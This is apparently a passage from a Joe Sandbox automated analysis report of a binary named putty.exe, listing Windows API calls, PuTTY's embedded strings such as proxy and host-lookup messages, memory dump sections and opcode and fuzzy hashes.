                              • Part of subcall function 00446525: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,00000000,0000FFFF,00000000,?,?,?,7556E010,0044081D,00449E36,00000000), ref: 00446595
                              • Part of subcall function 00446525: GetLastError.KERNEL32(?,?,7556E010,0044081D,00449E36,00000000), ref: 004465A0
                              • Part of subcall function 00446525: _strlen.LIBCMT ref: 004465DE
                              • Part of subcall function 004401C6: MessageBoxA.USER32(00000000,?,00000010), ref: 004401FF
                            • CreateFileA.KERNEL32(00000000,-80000001,?,00000000,00000000,00000000,00000000,0044A091,?,?,\PUTTY.RND), ref: 00449E93
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ErrorLast$FileMessage$CreateDeleteFormat_strlen
                            • String ID: Unable to delete '%s': %s$\PUTTY.RND
                            • API String ID: 3916261023-2141787646
                            • Opcode ID: 9e5fcc03815eb5c0cabb29681c52e4c9b21c34e9ed7a1f70735ed2a76240a55c
                            • Instruction ID: ba6e03af04538fef1bec780f2d5ab2abec2baf9c1f937dfa147e7f97fe546d4d
                            • Opcode Fuzzy Hash: 9e5fcc03815eb5c0cabb29681c52e4c9b21c34e9ed7a1f70735ed2a76240a55c
                            • Instruction Fuzzy Hash: C901F7B17012012BFB189A399C06B3F3597ABC4B12F34CA3DF411D51E8EA388C416A19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetStringTypeW.KERNEL32(00000001,00470560,00000001,?,00470568,0000001C,00454704,00000001,00000020,00000100,?,00000000), ref: 00450AB9
                            • GetLastError.KERNEL32 ref: 00450ACB
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,004549BC,00000000,00000000,00470568,0000001C,00454704,00000001,00000020,00000100,?,00000000), ref: 00450B2D
                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004549BC,?,00000000), ref: 00450BAB
                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00450BBD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiStringTypeWide$ErrorLast
                            • String ID:
                            • API String ID: 3581945363-0
                            • Opcode ID: ef52f63316f1461ec748eef3cb2810c7feac3e3a1fe46bbc2efeab00f2312e14
                            • Instruction ID: aea319fab38a72a8bbfe8bbf9b6c23d4f7c2be548620139dfb7d5622555c3862
                            • Opcode Fuzzy Hash: ef52f63316f1461ec748eef3cb2810c7feac3e3a1fe46bbc2efeab00f2312e14
                            • Instruction Fuzzy Hash: B241F035800214ABCF228FA4DC85AAF3B65FF08766F14421AFC14A7352D738DD94CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ed0aaa4dc42c42cd756b28ca5a5434b3a5980bb8bb633aa9a38db8f08b1c714
                            • Instruction ID: cd8a7987a2ce3d699d2cf41ea139f739c00349b386ce6fff499b32fc831bd6bc
                            • Opcode Fuzzy Hash: 6ed0aaa4dc42c42cd756b28ca5a5434b3a5980bb8bb633aa9a38db8f08b1c714
                            • Instruction Fuzzy Hash: A431E532D10114BADB388F58DC44ABF3BA9EB9D311F112137F80AD22A1D738DD899698
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFontA.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000000), ref: 0043B7E2
                            • GetDC.USER32(00000000), ref: 0043B7EC
                            • SelectObject.GDI32(00000000,00000000), ref: 0043B7FC
                            • GetTextMetricsA.GDI32(00000000,?), ref: 0043B80B
                            • ReleaseDC.USER32(00000000,00000000), ref: 0043B826
                            • DeleteObject.GDI32(00000000), ref: 0043B834
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteFontMetricsReleaseSelectText
                            • String ID:
                            • API String ID: 4134816134-0
                            • Opcode ID: 45c064472e089bf6f3bd8f99de5a685704ebda11ee8b412d332a5a12ca8bd70e
                            • Instruction ID: 6c22b76d9b17a7e5f011e95705cf5180a69971eff25b477cfb2768bc3a6f2ccc
                            • Opcode Fuzzy Hash: 45c064472e089bf6f3bd8f99de5a685704ebda11ee8b412d332a5a12ca8bd70e
                            • Instruction Fuzzy Hash: 1F21F335601214AFC7256BB49C89BAF7A6DEF49B46F14107AF30697281DB78890187E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • ..\x11fwd.c, xrefs: 0044C0EF
                            • %s X11 proxy: %s, xrefs: 0044C014
                            • pr->disp->localauthdatalen <= lenof(realauthdata), xrefs: 0044C0F4
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s X11 proxy: %s$..\x11fwd.c$pr->disp->localauthdatalen <= lenof(realauthdata)
                            • API String ID: 0-912635719
                            • Opcode ID: b82c8b1f87981e5209e923e9237ccd891a91baf3a030cfbfaf4e1fa57d82442c
                            • Instruction ID: aa9b856a89396d4e97b9df0699b6f51853c7c331adcbfbfd32c8426ed6ceeb05
                            • Opcode Fuzzy Hash: b82c8b1f87981e5209e923e9237ccd891a91baf3a030cfbfaf4e1fa57d82442c
                            • Instruction Fuzzy Hash: 7BB1C070500745EFD721DF65C881AA7BBF4EF08304B18892EE99A87752D738E905CF99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCPInfo.KERNEL32(0000FDE9,?,?,00000000), ref: 0044A6EA
                            • GetCPInfo.KERNEL32(?,?,?,00000000), ref: 0044A7BF
                            • GetACP.KERNEL32(?,00000000), ref: 0044A807
                            • GetOEMCP.KERNEL32(?,00000000), ref: 0044A814
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info
                            • String ID: :
                            • API String ID: 1807457897-336475711
                            • Opcode ID: de446394af216d24f9adea2586820ecf640c9afad83abd2b02bb643387feb8c0
                            • Instruction ID: f119aaab1a313e3a31439d9eefd1e2c6567b14e37ebd0cfae5b66938f821c3bb
                            • Opcode Fuzzy Hash: de446394af216d24f9adea2586820ecf640c9afad83abd2b02bb643387feb8c0
                            • Instruction Fuzzy Hash: A45137715483925FFB305A6598C423B77E8AB14329F28053BF9E0862C2D76DCCA1C65B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strrchr
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE
                            • API String ID: 3213747228-4032953357
                            • Opcode ID: df49cdc6cb45aa4904792bf7190c50cf5f2ae019256db9629bfd9e9e027abac2
                            • Instruction ID: 1c678c0df6eb705945bca5a9004ff5423bf29443683ac31a5fe9b31f7c89d6e4
                            • Opcode Fuzzy Hash: df49cdc6cb45aa4904792bf7190c50cf5f2ae019256db9629bfd9e9e027abac2
                            • Instruction Fuzzy Hash: 21517CB1600700AFCB319F26D88195ABBF5FF08344B90883FF98596361D77AE855CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • Proxy error: SOCKS proxy refused CHAP authentication, xrefs: 0040782B
                            • Proxy error: Server chose CHAP of other than HMAC-MD5 but we didn't offer it!, xrefs: 0040772D
                            • Proxy error: SOCKS proxy won't negotiate CHAP with us, xrefs: 0040781D
                            • Proxy error: SOCKS proxy wants a different CHAP version, xrefs: 00407810
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: Proxy error: SOCKS proxy refused CHAP authentication$Proxy error: SOCKS proxy wants a different CHAP version$Proxy error: SOCKS proxy won't negotiate CHAP with us$Proxy error: Server chose CHAP of other than HMAC-MD5 but we didn't offer it!
                            • API String ID: 4218353326-4119185519
                            • Opcode ID: 1bae4655470863089d2bbbf9340d05ef89dceb84f9c13dc8161ef4d7cc6e5e06
                            • Instruction ID: 395f0cc708b69254f2840674b855e815a2a98cf2161379e2e97e3ceb85659c18
                            • Opcode Fuzzy Hash: 1bae4655470863089d2bbbf9340d05ef89dceb84f9c13dc8161ef4d7cc6e5e06
                            • Instruction Fuzzy Hash: F7512870D04B04AED7219B248C81BBB76F4AB04758F10487FE696B21C2D778B941CB6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                            • _strrchr.LIBCMT ref: 0041E5E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat_strlen_strrchr
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE
                            • API String ID: 3875031943-4032953357
                            • Opcode ID: 7421521c3b7a6d3280c86c23bcdbfd8c8d57095114ba729c07e67121d2c3cb44
                            • Instruction ID: 3e16c193b552c3beff44ae1440ddb5d1b1373f7a08cd02c1dd35ba95975b10e8
                            • Opcode Fuzzy Hash: 7421521c3b7a6d3280c86c23bcdbfd8c8d57095114ba729c07e67121d2c3cb44
                            • Instruction Fuzzy Hash: 6341C174504301AFEB216F72CD45BEA7BE8EF14308F10042FF9459A292EBBA5990CB5C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat_strlengetaddrinfoinet_addr
                            • String ID: Network is down
                            • API String ID: 1492357749-2877858764
                            • Opcode ID: 8d4abe4bcc3e48f6a0e83397993a706f0b94d106ef2c904e7c51b573fe2cfd51
                            • Instruction ID: b7fa0ed299153501d8b096d43b0cb8fde334e4a9cb6701a14005c4008b19b7be
                            • Opcode Fuzzy Hash: 8d4abe4bcc3e48f6a0e83397993a706f0b94d106ef2c904e7c51b573fe2cfd51
                            • Instruction Fuzzy Hash: 7D414B72C04254DFDF118FA4CCC5ADABBB4FF0A304F14089AE8549B102E37866A5CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strrchr
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE
                            • API String ID: 3213747228-4032953357
                            • Opcode ID: 93acf89b5bf2ab8b92cf42038301cf40608bd4bca39bc0bfb4fdded447a1d311
                            • Instruction ID: 1ce736e6af8d1388e2f5cfb1169842c2fd5ecaa2103f7b2c911085432fde4018
                            • Opcode Fuzzy Hash: 93acf89b5bf2ab8b92cf42038301cf40608bd4bca39bc0bfb4fdded447a1d311
                            • Instruction Fuzzy Hash: F131A171900305AFEB21AF758C41B9B3BA9EF08308F10443FF944A62D2E77AD811CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strspn
                            • String ID: 0123456789
                            • API String ID: 3953159543-2793719750
                            • Opcode ID: c9b7915d83230f1ec4cf3426f06b73027568f5724ed1ff2f302d5f18ee519b29
                            • Instruction ID: 832fb0fe27b3c345734c07b06e37987222d2acb1b94b11ce50eb985f2f1119e2
                            • Opcode Fuzzy Hash: c9b7915d83230f1ec4cf3426f06b73027568f5724ed1ff2f302d5f18ee519b29
                            • Instruction Fuzzy Hash: F9311975900704BFDB11DFA0CD89E5ABBB9EF4C704F008898F69A9B291C7B6AD41CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: ..\windows\winnet.c$FALSE$addr->addresses && step.curraddr < addr->naddresses$family != AF_UNSPEC
                            • API String ID: 0-1926846120
                            • Opcode ID: 19fce80ba19900669a5412d8cd7ada76b3860c39718be1602e1d22e68ce5cd7b
                            • Instruction ID: e73a41beae0cbfa9de5e91e3a7e8736fbb216f3cf3605b4bed91a20e2dda818c
                            • Opcode Fuzzy Hash: 19fce80ba19900669a5412d8cd7ada76b3860c39718be1602e1d22e68ce5cd7b
                            • Instruction Fuzzy Hash: D4110471A88301BBFB305A05DCC2B5773A4AB00718F64452BFA0456781E7BDBD86869F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(00000003,?,00000190,00000000,00000000), ref: 0043B329
                            • SendDlgItemMessageA.USER32(00000003,?,?,00000000,00000000), ref: 0043B350
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
                            • API String ID: 3015471070-1818056993
                            • Opcode ID: 13c7b18d93c76a8f5aeddb88fe2087e41142d81066dbff5201adc5e52565f915
                            • Instruction ID: 5e766020d705b1ea907fec4bf615e8864eaeb2b838a7f040b9587eabe52cf42c
                            • Opcode Fuzzy Hash: 13c7b18d93c76a8f5aeddb88fe2087e41142d81066dbff5201adc5e52565f915
                            • Instruction Fuzzy Hash: AF1129B2240514EFD6109A28DC81E277758EB0A725F251367F664D72D1DB35EC108AAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0043D70F
                            • GetSystemMetrics.USER32(00000000), ref: 0043D727
                            • GetSystemMetrics.USER32(00000001), ref: 0043D72E
                            • lstrcpynA.KERNEL32(-00000026,DISPLAY,00000020,00000000), ref: 0043D754
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: System$Metrics$InfoParameterslstrcpyn
                            • String ID: DISPLAY
                            • API String ID: 2307409384-865373369
                            • Opcode ID: 6a611bec164de42e3f219edb2ff34b5a2d0c86826c1b2e8d37fc6b6adffe0e9f
                            • Instruction ID: c690c3e9753278bd5f641e3d7771ba2765212994390f623c2822e1d86417151b
                            • Opcode Fuzzy Hash: 6a611bec164de42e3f219edb2ff34b5a2d0c86826c1b2e8d37fc6b6adffe0e9f
                            • Instruction Fuzzy Hash: 0211A071A00324ABCF119F64AD8465BBBAAFF09751F009063FD09AA106D3B5D941CFE9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadCursorA.USER32(00000000,-00007F01), ref: 0043DA12
                            • SetClassLongA.USER32(000000F4,00000000), ref: 0043DA23
                            • SetCursor.USER32(00000000,?,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26), ref: 0043DA2A
                            • ShowCursor.USER32(00000000,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26,0000005C), ref: 0043DA3A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Cursor$ClassLoadLongShow
                            • String ID: ..\windows\window.c
                            • API String ID: 1160125251-1664963243
                            • Opcode ID: eaacf526c0ea13ef975f4ddc7a981a34db081c4e73dc6338c722537515588ef4
                            • Instruction ID: 5652b3f23fae6b5c87a3fc23e6de025aa0941c12f286dd642dba84bccaeb281a
                            • Opcode Fuzzy Hash: eaacf526c0ea13ef975f4ddc7a981a34db081c4e73dc6338c722537515588ef4
                            • Instruction Fuzzy Hash: 6B114C70A0C252AFD7105B64FC09B763764EB08752F24513BF909D12E0E72C8881D79D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _wctomb_s.LIBCMT ref: 004022D1
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy_wctomb_s
                            • String ID: ..\conf.c$gvE$subkeytypes[primary] == TYPE_STR$valuetypes[primary] == TYPE_STR
                            • API String ID: 3884260313-583392501
                            • Opcode ID: c5f62212fa4e37dfea34a2d423d40ac07018d333af9f9d7800c0c044cafd27a9
                            • Instruction ID: 8feadaaac9552ce52bb76c90c51ca0d6fc3b7b93bb0e59e412f14a764c8fef6e
                            • Opcode Fuzzy Hash: c5f62212fa4e37dfea34a2d423d40ac07018d333af9f9d7800c0c044cafd27a9
                            • Instruction Fuzzy Hash: 5C01C4B0600204BFDB119F89DD0AE9A77A8EB45700F1440BBFD04AB3D1E2B9ED04C69A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadCursorA.USER32(00000000,-00007F01), ref: 0043DA12
                            • SetClassLongA.USER32(000000F4,00000000), ref: 0043DA23
                            • SetCursor.USER32(00000000,?,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26), ref: 0043DA2A
                            • ShowCursor.USER32(00000000,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26,0000005C), ref: 0043DA3A
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
